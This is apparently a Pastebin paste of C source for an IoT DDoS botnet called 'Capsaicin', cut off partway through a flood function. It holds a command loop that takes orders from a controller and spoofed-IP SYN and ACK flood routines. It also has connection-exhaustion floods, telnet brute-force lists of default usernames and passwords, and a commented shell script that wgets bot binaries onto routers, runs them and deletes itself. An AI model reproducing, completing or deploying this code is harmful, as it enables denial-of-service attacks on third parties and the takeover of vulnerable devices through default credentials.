API tools faq
paste
Advertisement
Guest User

gast pidor

a guest
Mar 25th, 2017
196
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 47.89 KB | None | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <unistd.h>
  3. #include <string.h>
  4. #include <netdb.h>
  5. #include <linux/ip.h>
  6. #include <linux/tcp.h>
  7. #include <sys/socket.h>
  8. #include <stdlib.h>
  9. #include <fcntl.h>
  10. #include <errno.h>
  11. #include <pthread.h>
  12. #include <string.h>
  13. #include <stdarg.h>
  14. #include <assert.h>
  15. #include <stdbool.h>
  16. #include <signal.h>
  17.  
  18. #define PAD_RIGHT 1
  19. #define PAD_ZERO 2
  20. #define PRINT_BUF_LEN 12
  21. #define CMD_IAC 255
  22. #define CMD_WILL 251
  23. #define CMD_WONT 252
  24. #define CMD_DO 253
  25. #define CMD_DONT 254
  26. #define OPT_SGA 3
  27.  
  28. /*
  29. Capsaicin botnet, based on lizard irc bot and lightaidra. Creds to them for some of the source.
  30.  
  31. DDoS Commands:
  32. .synflood <host> <port> <time>
  33. .ngsynflood <host> <port> <time>
  34. .ackflood <host> <port> <time>
  35. .ngackflood <host> <port> <time>
  36. .holdflood <host> <port> <time> (Sometimes takes longer to finish)
  37. .junkflood <host> <port> <time> (Sometimes takes longer to finish)
  38.  
  39. Scanner Commands:
  40. .scan_start - Starts telnet scanner
  41. .scan_stop - Stops telnet scanner
  42.  
  43. Misc Commands:
  44. .exit - Exits the bot
  45. */
  46.  
  47. /*
  48. GEBINARIES.SH EXAMPLE
  49. #!/bin/sh
  50. # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
  51. # UPLOAD GETBINARIES.SH IN YOUR HTTPD.
  52. #
  53. # LEGAL DISCLAIMER: It is the end user's responsibility to obey
  54. # all applicable local, state and federal laws. Developers assume
  55. # no liability and are not responsible for any misuse or damage
  56. # caused by this program.
  57.  
  58. # YOUR HTTPD SERVER:
  59. REFERENCE_HTTP="http://127.0.0.1"
  60.  
  61. # NAME OF BINARIES:
  62. REFERENCE_MIPSEL="mipsel"
  63. REFERENCE_MIPS="mips"
  64. REFERENCE_SUPERH="sh"
  65. REFERENCE_ARM="arm"
  66. REFERENCE_PPC="ppc"
  67.  
  68. rm -fr /var/run/${REFERENCE_MIPSEL} \
  69. /var/run/${REFERENCE_MIPS} \
  70. /var/run/${REFERENCE_SUPERH} \
  71. /var/run/${REFERENCE_ARM} \
  72. /var/run/${REFERENCE_PPC}
  73.  
  74. wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL}
  75. wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS}
  76. wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM}
  77. wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC}
  78. wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH}
  79.  
  80. sleep 3;
  81. rm -fr /var/run/getbinaries.sh
  82. */
  83.  
  84. //CONFIG
  85. char *host = "127.0.0.1";
  86. char *port = "8085";
  87. char getbinariesURL[] = "http://127.0.0.1/getbinaries.sh"; //URL of your servers getbinaries.sh
  88.  
  89. //Telnet brute force usernames and passwords
  90. char *usernames[] = {"root\0", "\0", "admin\0", "user\0", "login\0", "guest\0"};
  91. char *passwords[] = {"root\0", "\0", "toor\0", "admin\0", "user\0", "guest\0", "login\0", "changeme\0", "1234\0", "12345\0", "123456\0", "default\0", "pass\0", "password\0"};
  92.  
  93. int conn;
  94. char sbuf[512];
  95.  
  96. unsigned long srchost;
  97. unsigned int dsthost;
  98. unsigned short uport;
  99. unsigned int useconds;
  100.  
  101. struct send_tcp {
  102. struct iphdr ip;
  103. struct tcphdr tcp;
  104. char buf[20];
  105. };
  106.  
  107. struct pseudo_header {
  108. unsigned int source_address;
  109. unsigned int dest_address;
  110. unsigned char placeholder;
  111. unsigned char protocol;
  112. unsigned short tcp_length;
  113. struct tcphdr tcp;
  114. char buf[20];
  115. };
  116.  
  117. //DEFINES
  118. void daemonize();
  119. unsigned int host2ip(char *hostname);
  120. unsigned int get_spoofed();
  121. unsigned short in_cksum(unsigned short *ptr, int nbytes);
  122. void synflood(unsigned int dest_addr, unsigned short dest_port, int ntime);
  123. void ngsynflood(unsigned int dest_addr, unsigned short dest_port, int ntime);
  124. void ackflood(unsigned int dest_addr, unsigned short dest_port, int ntime);
  125. void ngackflood(unsigned int dest_addr, unsigned short dest_port, int ntime);
  126. void* StartTheLelz(int sockfd);
  127. in_addr_t getRandomPublicIP();
  128. int szprintf(unsigned char *out, const unsigned char *format, ...);
  129. int sclose(int fd);
  130. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex);
  131. int print(unsigned char **out, const unsigned char *format, va_list args );
  132. int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase);
  133. int matchPrompt(char *bufStr);
  134. int negotiate(int sock, unsigned char *buf, int len);
  135. int prints(unsigned char **out, const unsigned char *string, int width, int pad);
  136. void printchar(unsigned char **str, int c);
  137. char** str_split(char* a_str, const char a_delim);
  138. bool prefix(const char *pre, const char *str);
  139. void Raw(char *data, int sockfd);
  140. void sendHOLD(unsigned char *ip, int port, int end_time);
  141. void sendJUNK(unsigned char *ip, int port, int end_time);
  142. int getHost(unsigned char *toGet, struct in_addr *i);
  143. void makeRandomStr(unsigned char *buf, int length);
  144. uint32_t rand_cmwc(void);
  145. static uint8_t ipState[5] = {0}; //starting from 1 becuz yolo
  146. static uint32_t Q[4096], c = 362436;
  147.  
  148. int main() {
  149. daemonize();
  150. pthread_t scanner;
  151. char *cmd[1024];
  152. char *cmdoutput[1024];
  153. int i;
  154. int sockfd, portno, n;
  155. struct sockaddr_in serveraddr;
  156. struct hostent *server;
  157. char *hostname;
  158. char buf[1024];
  159.  
  160. hostname = host;
  161. portno = atoi(port);
  162.  
  163. /* socket: create the socket */
  164. sockfd = socket(AF_INET, SOCK_STREAM, 0);
  165. if (sockfd < 0)
  166. error("ERROR opening socket");
  167.  
  168. /* gethostbyname: get the server's DNS entry */
  169. server = gethostbyname(hostname);
  170. if (server == NULL) {
  171. fprintf(stderr,"ERROR, no such host as %s\n", hostname);
  172. exit(0);
  173. }
  174.  
  175. /* build the server's Internet address */
  176. bzero((char *) &serveraddr, sizeof(serveraddr));
  177. serveraddr.sin_family = AF_INET;
  178. bcopy((char *)server->h_addr,
  179. (char *)&serveraddr.sin_addr.s_addr, server->h_length);
  180. serveraddr.sin_port = htons(portno);
  181.  
  182. /* connect: create a connection with the server */
  183. if (connect(sockfd, &serveraddr, sizeof(serveraddr)) < 0)
  184. error("ERROR connecting");
  185. /* synflood(), ngsynflood(), ackflood(), ngackflood() */
  186. /* these functions are adapted from ktx.c */
  187. while(true) {
  188. /* print the server's reply */
  189. bzero(buf, 1024);
  190. n = read(sockfd, buf, 1024);
  191. if (n < 0)
  192. error("ERROR reading from socket");
  193. printf("Echo from server: %s", buf);
  194. char** tokens;
  195. tokens = str_split(buf, ' ');
  196. if (strncmp(buf,".synflood",9)==0) {
  197. Raw("[nsynflood] Starting SYN flood!\r\n", sockfd);
  198. printf("[nsynflood] Starting SYN flood!\r\n");
  199. ngsynflood(host2ip(tokens[1]), atoi(tokens[2]), atoi(tokens[3]));
  200. Raw("[nsynflood] SYN flood finished!\r\n", sockfd);
  201. printf("[nsynflood] SYN flood finished!\r\n");
  202. } else if (strncmp(buf,".ngsynflood",11)==0) {
  203. Raw("[ngsynflood] Starting new generation SYN flood!\r\n", sockfd);
  204. printf("[ngsynflood] Starting new generation SYN flood!\r\n");
  205. ngsynflood(host2ip(tokens[1]), atoi(tokens[2]), atoi(tokens[3]));
  206. Raw("[ngsynflood] New generation SYN flood finished!\r\n", sockfd);
  207. printf("[ngsynflood] New generation SYN flood finished!\r\n");
  208. } else if (strncmp(buf,".ackflood",9)==0) {
  209. Raw("[ackflood] Starting ACK flood!\r\n", sockfd);
  210. printf("[ngsynflood] Starting ACK flood!\r\n");
  211. ackflood(host2ip(tokens[1]), atoi(tokens[2]), atoi(tokens[3]));
  212. Raw("[ackflood] ACK flood finished!\r\n", sockfd);
  213. printf("[ackflood] ACK flood finished!\r\n");
  214. } else if (strncmp(buf,".ngackflood",11)==0) {
  215. Raw("[ngackflood] Starting new generation ACK flood!\r\n", sockfd);
  216. printf("[ngackflood] Starting new generation ACK flood!\r\n");
  217. ngackflood(host2ip(tokens[1]), atoi(tokens[2]), atoi(tokens[3]));
  218. Raw("[ngackflood] New generation ACK flood finished!\r\n", sockfd);
  219. printf("[ngackflood] New generation ACK flood finished!\r\n");
  220. } else if (strncmp(buf,".holdflood",10)==0) {
  221. Raw("[holdflood] Starting hold flood!\r\n", sockfd);
  222. printf("[holdflood] Starting hold flood!\r\n");
  223. sendHOLD(host2ip(tokens[1]), atoi(tokens[2]), atoi(tokens[3]));
  224. Raw("[holdflood] Hold flood finished!\r\n", sockfd);
  225. printf("[holdflood] Hold flood finished!\r\n");
  226. } else if (strncmp(buf,".junkflood",10)==0) {
  227. Raw("[JUNKflood] Starting JUNK flood!\r\n", sockfd);
  228. printf("[JUNKflood] Starting JUNK flood!\r\n");
  229. sendJUNK(host2ip(tokens[1]), atoi(tokens[2]), atoi(tokens[3]));
  230. Raw("[JUNKflood] JUNK flood finished!\r\n", sockfd);
  231. printf("[JUNKflood] JUNK flood finished!\r\n");
  232. } else if (strncmp(buf,".scan_start",11)==0) {
  233. printf("[Telnet Scanner] Starting the scanner...\r\n");
  234. Raw("[Telnet Scanner] Starting the scanner...\r\n", sockfd);
  235. pthread_create(&scanner, NULL, StartTheLelz, (void *)&sockfd);
  236. //pthread_join(scanner, NULL);
  237. } else if (strncmp(buf,".scan_stop",10)==0) {
  238. printf("[Telnet Scanner] Stopping the scanner...\r\n");
  239. Raw("[Telnet Scanner] Stopping the scanner...\r\n", sockfd);
  240. pthread_cancel(scanner);
  241. } else if (strncmp(buf,".exit",5)==0) {
  242. exit(0);
  243. }
  244.  
  245. }
  246.  
  247. return 0;
  248.  
  249. }
  250.  
  251. void Raw(char *data, int sockfd) {
  252. /* send the message line to the server */
  253. int n;
  254. n = write(sockfd, data, strlen(data));
  255. if (n < 0)
  256. error("ERROR writing to socket");
  257. }
  258.  
  259. /* daemonize(void) */
  260. /* set jekel in background mode. */
  261. void daemonize() {
  262. int daemonize_pid = fork();
  263. if (daemonize_pid) exit(EXIT_SUCCESS);
  264. }
  265.  
  266. unsigned int host2ip(char *hostname) {
  267.  
  268. static struct in_addr i;
  269. struct hostent *h;
  270.  
  271. i.s_addr = inet_addr((const char *)hostname);
  272.  
  273. if (i.s_addr == -1) {
  274. h = gethostbyname(hostname);
  275.  
  276. if (h == NULL) exit(0);
  277.  
  278. bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
  279. }
  280.  
  281. return i.s_addr;
  282. }
  283.  
  284. unsigned int get_spoofed() {
  285. char spa[21];
  286. int a, b, c, d;
  287.  
  288. srand(time(0));
  289.  
  290. int random_ct = rand();
  291. int random_num = ((random_ct % 254) + 1);
  292. a = random_num;
  293.  
  294. random_ct = rand();
  295. random_num = ((random_ct % 254) + 1);
  296. b = random_num;
  297.  
  298. random_ct = rand();
  299. random_num = ((random_ct % 254) + 1);
  300. c = random_num;
  301.  
  302. random_ct = rand();
  303. random_num = ((random_ct % 254) + 1);
  304. d = random_num;
  305.  
  306. snprintf(spa, sizeof(spa), "%d.%d.%d.%d", a, b, c, d);
  307.  
  308. return ((unsigned int)host2ip(spa));
  309. }
  310.  
  311. unsigned short in_cksum(unsigned short *ptr, int nbytes) {
  312. register long sum;
  313. u_short oddbyte;
  314. register u_short answer;
  315.  
  316. sum = 0;
  317.  
  318. while (nbytes > 1) {
  319. sum += *ptr++;
  320. nbytes -= 2;
  321. }
  322.  
  323. if (nbytes == 1) {
  324. oddbyte = 0;
  325. *((u_char *) & oddbyte) = *(u_char *) ptr;
  326. sum += oddbyte;
  327. }
  328.  
  329. sum = (sum >> 16) + (sum & 0xffff);
  330. sum += (sum >> 16);
  331. answer = ~sum;
  332.  
  333. return answer;
  334. }
  335.  
  336. /* synflood(), ngsynflood(), ackflood(), ngackflood() */
  337. /* these functions are adapted from ktx.c */
  338. void synflood(unsigned int dest_addr, unsigned short dest_port, int ntime) {
  339. int get;
  340. struct send_tcp send_tcp;
  341. struct pseudo_header pseudo_header;
  342. struct sockaddr_in sin;
  343. unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0;
  344. unsigned int psize = 20, source, dest, check;
  345. unsigned long saddr, daddr, secs;
  346. time_t start = time(NULL);
  347.  
  348. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  349. return; {
  350. int i;
  351.  
  352. for (i = 0; i < 20; i++) {
  353. send_tcp.buf[i] = (u_char) syn[i];
  354. }
  355. }
  356.  
  357. daddr = dest_addr;
  358. secs = ntime;
  359.  
  360. send_tcp.ip.ihl = 5;
  361. send_tcp.ip.version = 4;
  362. send_tcp.ip.tos = 16;
  363. send_tcp.ip.frag_off = 64;
  364. send_tcp.ip.ttl = 64;
  365. send_tcp.ip.protocol = 6;
  366. send_tcp.tcp.ack_seq = 0;
  367. send_tcp.tcp.doff = 10;
  368. send_tcp.tcp.res1 = 0;
  369. send_tcp.tcp.cwr = 0;
  370. send_tcp.tcp.ece = 0;
  371. send_tcp.tcp.urg = 0;
  372. send_tcp.tcp.ack = 0;
  373. send_tcp.tcp.psh = 0;
  374. send_tcp.tcp.rst = 0;
  375. send_tcp.tcp.fin = 0;
  376. send_tcp.tcp.syn = 1;
  377. send_tcp.tcp.window = 30845;
  378. send_tcp.tcp.urg_ptr = 0;
  379. dest = htons(dest_port);
  380.  
  381. while (1) {
  382. source = rand();
  383. if (dest_port == 0) dest = rand();
  384.  
  385. if (srchost == 0) saddr = get_spoofed();
  386. else saddr = srchost;
  387.  
  388. send_tcp.ip.tot_len = htons(40 + psize);
  389. send_tcp.ip.id = rand();
  390. send_tcp.ip.saddr = saddr;
  391. send_tcp.ip.daddr = daddr;
  392. send_tcp.ip.check = 0;
  393. send_tcp.tcp.source = source;
  394. send_tcp.tcp.dest = dest;
  395. send_tcp.tcp.seq = rand();
  396. send_tcp.tcp.check = 0;
  397. sin.sin_family = AF_INET;
  398. sin.sin_port = dest;
  399. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  400. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  401. check = rand();
  402. send_tcp.buf[9] = ((char *)&check)[0];
  403. send_tcp.buf[10] = ((char *)&check)[1];
  404. send_tcp.buf[11] = ((char *)&check)[2];
  405. send_tcp.buf[12] = ((char *)&check)[3];
  406. pseudo_header.source_address = send_tcp.ip.saddr;
  407. pseudo_header.dest_address = send_tcp.ip.daddr;
  408. pseudo_header.placeholder = 0;
  409. pseudo_header.protocol = IPPROTO_TCP;
  410. pseudo_header.tcp_length = htons(20 + psize);
  411. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  412. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  413. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize);
  414. sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  415.  
  416. if (a >= 50) {
  417. if (time(NULL) >= start + secs) {
  418. return;
  419. }
  420.  
  421. a = 0;
  422. }
  423.  
  424. a++;
  425. }
  426.  
  427. close(get);
  428. return;
  429. }
  430.  
  431. void ngsynflood(unsigned int dest_addr, unsigned short dest_port, int ntime) {
  432. int get;
  433. struct send_tcp send_tcp;
  434. struct pseudo_header pseudo_header;
  435. struct sockaddr_in sin;
  436. unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0;
  437. unsigned int psize = 20, source, dest, check;
  438. unsigned long saddr, daddr, secs;
  439. time_t start = time(NULL);
  440.  
  441. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  442. return; {
  443. int i;
  444.  
  445. for (i = 0; i < 20; i++) {
  446. send_tcp.buf[i] = (u_char) syn[i];
  447. }
  448. }
  449.  
  450. daddr = dest_addr;
  451. secs = ntime;
  452.  
  453. send_tcp.ip.ihl = 5;
  454. send_tcp.ip.version = 4;
  455. send_tcp.ip.tos = 16;
  456. send_tcp.ip.frag_off = 64;
  457. send_tcp.ip.ttl = 64;
  458. send_tcp.ip.protocol = 6;
  459. send_tcp.tcp.ack_seq = 0;
  460. send_tcp.tcp.doff = 10;
  461. send_tcp.tcp.res1 = 0;
  462. send_tcp.tcp.cwr = 0;
  463. send_tcp.tcp.ece = 0;
  464. send_tcp.tcp.urg = 0;
  465. send_tcp.tcp.ack = 0;
  466. send_tcp.tcp.psh = 0;
  467. send_tcp.tcp.rst = 0;
  468. send_tcp.tcp.fin = 0;
  469. send_tcp.tcp.syn = 1;
  470. send_tcp.tcp.window = 30845;
  471. send_tcp.tcp.urg_ptr = 0;
  472. dest = htons(dest_port);
  473.  
  474. while (1) {
  475. source = rand();
  476. if (dest_port == 0) dest = rand();
  477.  
  478. if (srchost == 0) saddr = get_spoofed();
  479. else saddr = srchost;
  480.  
  481. send_tcp.ip.tot_len = htons(40 + psize);
  482. send_tcp.ip.id = rand();
  483. send_tcp.ip.saddr = saddr;
  484. send_tcp.ip.daddr = daddr;
  485. send_tcp.ip.check = 0;
  486. send_tcp.tcp.source = source;
  487. send_tcp.tcp.dest = dest;
  488. send_tcp.tcp.seq = rand();
  489. send_tcp.tcp.check = 0;
  490. sin.sin_family = AF_INET;
  491. sin.sin_port = dest;
  492. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  493. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  494. check = rand();
  495. send_tcp.buf[9] = ((char *)&check)[0];
  496. send_tcp.buf[10] = ((char *)&check)[1];
  497. send_tcp.buf[11] = ((char *)&check)[2];
  498. send_tcp.buf[12] = ((char *)&check)[3];
  499. pseudo_header.source_address = send_tcp.ip.saddr;
  500. pseudo_header.dest_address = send_tcp.ip.daddr;
  501. pseudo_header.placeholder = 0;
  502. pseudo_header.protocol = IPPROTO_TCP;
  503. pseudo_header.tcp_length = htons(20 + psize);
  504. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  505. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  506. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize);
  507. sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  508.  
  509. if (a >= 50) {
  510. if (time(NULL) >= start + secs) {
  511. close(get);
  512. return;
  513. }
  514.  
  515. a = 0;
  516. }
  517.  
  518. a++;
  519. }
  520.  
  521. close(get);
  522. return;
  523. }
  524.  
  525. void ackflood(unsigned int dest_addr, unsigned short dest_port, int ntime) {
  526. int get;
  527. struct send_tcp send_tcp;
  528. struct pseudo_header pseudo_header;
  529. struct sockaddr_in sin;
  530. unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0;
  531. unsigned int psize = 20, source, dest, check;
  532. unsigned long saddr, daddr, secs;
  533. time_t start = time(NULL);
  534.  
  535. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  536. return; {
  537. int i;
  538. for (i = 0; i < 20; i++)
  539. send_tcp.buf[i] = (u_char) syn[i];
  540. }
  541.  
  542. daddr = dest_addr;
  543. secs = ntime;
  544. dest = htons(dest_port);
  545.  
  546. send_tcp.ip.ihl = 5;
  547. send_tcp.ip.version = 4;
  548. send_tcp.ip.tos = 16;
  549. send_tcp.ip.frag_off = 64;
  550. send_tcp.ip.ttl = 255;
  551. send_tcp.ip.protocol = 6;
  552. send_tcp.tcp.doff = 5;
  553. send_tcp.tcp.res1 = 0;
  554. send_tcp.tcp.cwr = 0;
  555. send_tcp.tcp.ece = 0;
  556. send_tcp.tcp.urg = 0;
  557. send_tcp.tcp.ack = 1;
  558. send_tcp.tcp.psh = 1;
  559. send_tcp.tcp.rst = 0;
  560. send_tcp.tcp.fin = 0;
  561. send_tcp.tcp.syn = 0;
  562. send_tcp.tcp.window = 30845;
  563. send_tcp.tcp.urg_ptr = 0;
  564.  
  565. while (1) {
  566. if (dest_port == 0) dest = rand();
  567. if (srchost == 0) saddr = get_spoofed();
  568. else saddr = srchost;
  569.  
  570. send_tcp.ip.tot_len = htons(40 + psize);
  571. send_tcp.ip.id = rand();
  572. send_tcp.ip.check = 0;
  573. send_tcp.ip.saddr = saddr;
  574. send_tcp.ip.daddr = daddr;
  575. send_tcp.tcp.source = rand();
  576. send_tcp.tcp.dest = dest;
  577. send_tcp.tcp.seq = rand();
  578. send_tcp.tcp.ack_seq = rand();
  579. send_tcp.tcp.check = 0;
  580. sin.sin_family = AF_INET;
  581. sin.sin_port = send_tcp.tcp.dest;
  582. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  583. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  584. check = in_cksum((unsigned short *)&send_tcp, 40);
  585. pseudo_header.source_address = send_tcp.ip.saddr;
  586. pseudo_header.dest_address = send_tcp.ip.daddr;
  587. pseudo_header.placeholder = 0;
  588. pseudo_header.protocol = IPPROTO_TCP;
  589. pseudo_header.tcp_length = htons(20 + psize);
  590. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  591. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  592. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize);
  593. sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  594.  
  595. if (a >= 50) {
  596. if (time(NULL) >= start + secs) {
  597. close(get);
  598. return;
  599. }
  600.  
  601. a = 0;
  602. }
  603.  
  604. a++;
  605. }
  606.  
  607. close(get);
  608. return;
  609. }
  610.  
  611. void ngackflood(unsigned int dest_addr, unsigned short dest_port, int ntime) {
  612. int get;
  613. struct send_tcp send_tcp;
  614. struct pseudo_header pseudo_header;
  615. struct sockaddr_in sin;
  616. unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0;
  617. unsigned int psize = 20, source, dest, check;
  618. unsigned long saddr, daddr, secs;
  619. time_t start = time(NULL);
  620.  
  621. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  622. return; {
  623. int i;
  624.  
  625. for (i = 0; i < 20; i++) {
  626. send_tcp.buf[i] = (u_char) syn[i];
  627. }
  628. }
  629.  
  630. daddr = dest_addr;
  631. secs = ntime;
  632. dest = htons(dest_port);
  633.  
  634. send_tcp.ip.ihl = 5;
  635. send_tcp.ip.version = 4;
  636. send_tcp.ip.tos = 16;
  637. send_tcp.ip.frag_off = 64;
  638. send_tcp.ip.ttl = 255;
  639. send_tcp.ip.protocol = 6;
  640. send_tcp.tcp.doff = 5;
  641. send_tcp.tcp.res1 = 0;
  642. send_tcp.tcp.cwr = 0;
  643. send_tcp.tcp.ece = 0;
  644. send_tcp.tcp.urg = 0;
  645. send_tcp.tcp.ack = 1;
  646. send_tcp.tcp.psh = 1;
  647. send_tcp.tcp.rst = 0;
  648. send_tcp.tcp.fin = 0;
  649. send_tcp.tcp.syn = 0;
  650. send_tcp.tcp.window = 30845;
  651. send_tcp.tcp.urg_ptr = 0;
  652.  
  653. while (1) {
  654. if (dest_port == 0) dest = rand();
  655.  
  656. if (srchost == 0) saddr = get_spoofed();
  657. else saddr = srchost;
  658.  
  659. send_tcp.ip.tot_len = htons(40 + psize);
  660. send_tcp.ip.id = rand();
  661. send_tcp.ip.check = 0;
  662. send_tcp.ip.saddr = saddr;
  663. send_tcp.ip.daddr = daddr;
  664. send_tcp.tcp.source = rand();
  665. send_tcp.tcp.dest = dest;
  666. send_tcp.tcp.seq = rand();
  667. send_tcp.tcp.ack_seq = rand();
  668. send_tcp.tcp.check = 0;
  669. sin.sin_family = AF_INET;
  670. sin.sin_port = send_tcp.tcp.dest;
  671. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  672. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  673. check = in_cksum((unsigned short *)&send_tcp, 40);
  674. pseudo_header.source_address = send_tcp.ip.saddr;
  675. pseudo_header.dest_address = send_tcp.ip.daddr;
  676. pseudo_header.placeholder = 0;
  677. pseudo_header.protocol = IPPROTO_TCP;
  678. pseudo_header.tcp_length = htons(20 + psize);
  679. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  680. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  681. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize);
  682. sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  683.  
  684. if (a >= 50) {
  685. if (time(NULL) >= start + secs) {
  686. close(get);
  687. return;
  688. }
  689.  
  690. a = 0;
  691. }
  692.  
  693. a++;
  694. }
  695.  
  696. close(get);
  697. return;
  698. }
  699.  
  700. void sendHOLD(unsigned char *ip, int port, int end_time)
  701. {
  702.  
  703. int max = getdtablesize() / 2, i;
  704.  
  705. struct sockaddr_in dest_addr;
  706. dest_addr.sin_family = AF_INET;
  707. dest_addr.sin_port = htons(port);
  708. if(getHost(ip, &dest_addr.sin_addr)) return;
  709. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  710.  
  711. struct state_t
  712. {
  713. int fd;
  714. uint8_t state;
  715. } fds[max];
  716. memset(fds, 0, max * (sizeof(int) + 1));
  717.  
  718. fd_set myset;
  719. struct timeval tv;
  720. socklen_t lon;
  721. int valopt, res;
  722.  
  723. unsigned char *watwat = malloc(1024);
  724. memset(watwat, 0, 1024);
  725.  
  726. int end = time(NULL) + end_time;
  727. while(end > time(NULL))
  728. {
  729. for(i = 0; i < max; i++)
  730. {
  731. switch(fds[i].state)
  732. {
  733. case 0:
  734. {
  735. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  736. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  737. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
  738. else fds[i].state = 1;
  739. }
  740. break;
  741.  
  742. case 1:
  743. {
  744. FD_ZERO(&myset);
  745. FD_SET(fds[i].fd, &myset);
  746. tv.tv_sec = 0;
  747. tv.tv_usec = 10000;
  748. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
  749. if(res == 1)
  750. {
  751. lon = sizeof(int);
  752. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  753. if(valopt)
  754. {
  755. close(fds[i].fd);
  756. fds[i].state = 0;
  757. } else {
  758. fds[i].state = 2;
  759. }
  760. } else if(res == -1)
  761. {
  762. close(fds[i].fd);
  763. fds[i].state = 0;
  764. }
  765. }
  766. break;
  767.  
  768. case 2:
  769. {
  770. FD_ZERO(&myset);
  771. FD_SET(fds[i].fd, &myset);
  772. tv.tv_sec = 0;
  773. tv.tv_usec = 10000;
  774. res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);
  775. if(res != 0)
  776. {
  777. close(fds[i].fd);
  778. fds[i].state = 0;
  779. }
  780. }
  781. break;
  782. }
  783. }
  784. }
  785. }
  786.  
  787. void sendJUNK(unsigned char *ip, int port, int end_time)
  788. {
  789. pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS,NULL);
  790. int max = getdtablesize() / 2, i;
  791.  
  792. struct sockaddr_in dest_addr;
  793. dest_addr.sin_family = AF_INET;
  794. dest_addr.sin_port = htons(port);
  795. if(getHost(ip, &dest_addr.sin_addr)) return;
  796. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  797.  
  798. struct state_t
  799. {
  800. int fd;
  801. uint8_t state;
  802. } fds[max];
  803. memset(fds, 0, max * (sizeof(int) + 1));
  804.  
  805. fd_set myset;
  806. struct timeval tv;
  807. socklen_t lon;
  808. int valopt, res;
  809.  
  810. unsigned char *watwat = malloc(1024);
  811. memset(watwat, 0, 1024);
  812.  
  813. int end = time(NULL) + end_time;
  814. while(end > time(NULL))
  815. {
  816. for(i = 0; i < max; i++)
  817. {
  818. switch(fds[i].state)
  819. {
  820. case 0:
  821. {
  822. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  823. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  824. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
  825. else fds[i].state = 1;
  826. }
  827. break;
  828.  
  829. case 1:
  830. {
